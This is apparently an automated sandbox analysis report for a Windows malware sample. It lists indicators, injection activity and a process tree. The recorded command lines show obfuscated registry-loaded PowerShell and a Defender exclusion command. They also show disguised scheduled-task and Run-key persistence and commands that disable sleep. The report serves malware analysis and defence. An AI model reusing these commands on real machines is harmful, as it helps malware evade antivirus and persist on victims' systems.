Analysis
-
max time kernel
301s -
max time network
57s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system -
submitted
16/01/2023, 04:17
Static task
static1
Behavioral task
behavioral1
Sample
73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
Resource
win10-20220812-en
General
-
Target
73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe
-
Size
3.8MB
-
MD5
8e9509369f821b09d81b5c3305fba76f
-
SHA1
79717c039c61d8dafa748f62e949eefe9b019c0b
-
SHA256
73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944
-
SHA512
517b9377f07f5faf68f684b647cefbdfa0c423ab3842fdd85f4d5abb367fa1abd7bfa6ed7282ce32777cc70049223f298ff713231d9f78bfab06ee1f5d4e5e2a
-
SSDEEP
98304:uGbIlvAq+fTmM2xntJa7IwQBwTDxINNqv4p:1bIlvAnynLW5Qk8
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 1368 created 1232 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 13 PID 1368 created 1232 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 13 PID 1368 created 1232 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 13 PID 1368 created 1232 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 13 PID 1368 created 1232 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 13 PID 608 created 420 608 powershell.EXE 3 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1368 set thread context of 820 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 38 PID 608 set thread context of 1808 608 powershell.EXE 47 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WinDefender\SecurityHealthSystray.exe 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1008 schtasks.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 207127916129d901 powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 940 powershell.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 656 powershell.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 552 powershell.exe 608 powershell.EXE 608 powershell.EXE 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1808 dllhost.exe 1816 powershell.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1232 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 940 powershell.exe Token: SeShutdownPrivilege 1764 powercfg.exe Token: SeShutdownPrivilege 1740 powercfg.exe Token: SeShutdownPrivilege 860 powercfg.exe Token: SeDebugPrivilege 656 powershell.exe Token: SeShutdownPrivilege 1880 powercfg.exe Token: SeDebugPrivilege 552 powershell.exe Token: SeDebugPrivilege 608 powershell.EXE Token: SeDebugPrivilege 608 powershell.EXE Token: SeDebugPrivilege 1808 dllhost.exe Token: SeDebugPrivilege 1816 powershell.EXE Token: SeShutdownPrivilege 1232 Explorer.EXE -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 1944 wrote to memory of 1764 1944 cmd.exe 33 PID 1944 wrote to memory of 1764 1944 cmd.exe 33 PID 1944 wrote to memory of 1764 1944 cmd.exe 33 PID 1944 wrote to memory of 1740 1944 cmd.exe 34 PID 1944 wrote to memory of 1740 1944 cmd.exe 34 PID 1944 wrote to memory of 1740 1944 cmd.exe 34 PID 1944 wrote to memory of 860 1944 cmd.exe 35 PID 1944 wrote to memory of 860 1944 cmd.exe 35 PID 1944 wrote to memory of 860 1944 cmd.exe 35 PID 1944 wrote to memory of 1880 1944 cmd.exe 36 PID 1944 wrote to memory of 1880 1944 cmd.exe 36 PID 1944 wrote to memory of 1880 1944 cmd.exe 36 PID 656 wrote to memory of 1008 656 powershell.exe 37 PID 656 wrote to memory of 1008 656 powershell.exe 37 PID 656 wrote to memory of 1008 656 powershell.exe 37 PID 1368 wrote to memory of 820 1368 73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe 38 PID 1356 wrote to memory of 608 1356 taskeng.exe 42 PID 1356 wrote to memory of 608 1356 taskeng.exe 42 PID 1356 wrote to memory of 608 1356 taskeng.exe 42 PID 552 wrote to memory of 1044 552 powershell.exe 44 PID 552 wrote to memory of 1044 552 powershell.exe 44 PID 552 wrote to memory of 1044 552 powershell.exe 44 PID 1356 wrote to memory of 1816 1356 taskeng.exe 45 PID 1356 wrote to memory of 1816 1356 taskeng.exe 45 PID 1356 wrote to memory of 1816 1356 taskeng.exe 45 PID 1356 wrote to memory of 1816 1356 taskeng.exe 45 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 608 wrote to memory of 1808 608 powershell.EXE 47 PID 1808 wrote to memory of 420 1808 dllhost.exe 3 PID 1808 wrote to memory of 468 1808 dllhost.exe 2 PID 1808 wrote to memory of 476 1808 dllhost.exe 1 PID 1808 wrote to memory of 484 1808 dllhost.exe 8 PID 1808 wrote to memory of 580 1808 dllhost.exe 25 PID 1808 wrote to memory of 660 1808 dllhost.exe 24 PID 1808 wrote to memory of 744 1808 dllhost.exe 23 PID 1808 wrote to memory of 796 1808 dllhost.exe 9 PID 1808 wrote to memory of 836 1808 dllhost.exe 22 PID 1808 wrote to memory of 872 1808 dllhost.exe 21 PID 1808 wrote to memory of 296 1808 dllhost.exe 10 PID 1808 wrote to memory of 368 1808 dllhost.exe 11 PID 1808 wrote to memory of 1036 1808 dllhost.exe 20 PID 1808 wrote to memory of 1120 1808 dllhost.exe 12 PID 1808 wrote to memory of 1168 1808 dllhost.exe 18 PID 1808 wrote to memory of 1232 1808 dllhost.exe 13 PID 1808 wrote to memory of 1732 1808 dllhost.exe 16 PID 1808 wrote to memory of 1984 1808 dllhost.exe 15 PID 1808 wrote to memory of 1144 1808 dllhost.exe 17 PID 1808 wrote to memory of 1356 1808 dllhost.exe 41 PID 1808 wrote to memory of 2004 1808 dllhost.exe 46
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:476
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵PID:468
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:796
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1168
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:296
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:368
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1120
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1984
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1732
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1036
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵PID:872
-
C:\Windows\system32\taskeng.exetaskeng.exe {0A3A631D-CD89-4177-96C4-DF4B6D29B786} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+'ag'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:608
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+'T'+'W'+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'l'+[Char](101)+''+'r'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)4⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:836
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:744
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:660
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:580
-
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c73d0caa-5aeb-479f-a4a5-2d57daa96fb1}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1808
-
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:484
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe"C:\Users\Admin\AppData\Local\Temp\73e10ada23b2432c979712c999ef0d9650f06eb1fda3a1da79ab7a80ccbca944.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#spcazkzgj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Windows Security Notifications' /tr '''C:\Program Files\WinDefender\SecurityHealthSystray.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WinDefender\SecurityHealthSystray.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Security Notifications' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Notifications" /t REG_SZ /f /d 'C:\Program Files\WinDefender\SecurityHealthSystray.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn "Windows Security Notifications" /tr "'C:\Program Files\WinDefender\SecurityHealthSystray.exe'"3⤵
- Creates scheduled task(s)
PID:1008
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1740
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zdald#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Windows Security Notifications" } Else { "C:\Program Files\WinDefender\SecurityHealthSystray.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:552 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn Windows Security Notifications3⤵PID:1044
-
-
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵PID:1144
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-126622808-2099810627-861755609-1210976297-9753293491060606787-12348396161924881707"1⤵PID:2004
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD570506296200defb7554506de3bf5b0f7
SHA1d27e967ace469f5cf9cae03b23fb42929bd9614f
SHA25665ee148f5a470fbec6555ee1eed964ae2cb6ae7d428b8d320c699d279d9b14bc
SHA51280a5194bb5a18ce3f656e0a6847d4dd14817460a6f1fd0ec8c9f64873957c0e0679afe82f17ddcfb7275594cc526cafa088caa45fad4d5315f9c874c4df6e2c0
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD570506296200defb7554506de3bf5b0f7
SHA1d27e967ace469f5cf9cae03b23fb42929bd9614f
SHA25665ee148f5a470fbec6555ee1eed964ae2cb6ae7d428b8d320c699d279d9b14bc
SHA51280a5194bb5a18ce3f656e0a6847d4dd14817460a6f1fd0ec8c9f64873957c0e0679afe82f17ddcfb7275594cc526cafa088caa45fad4d5315f9c874c4df6e2c0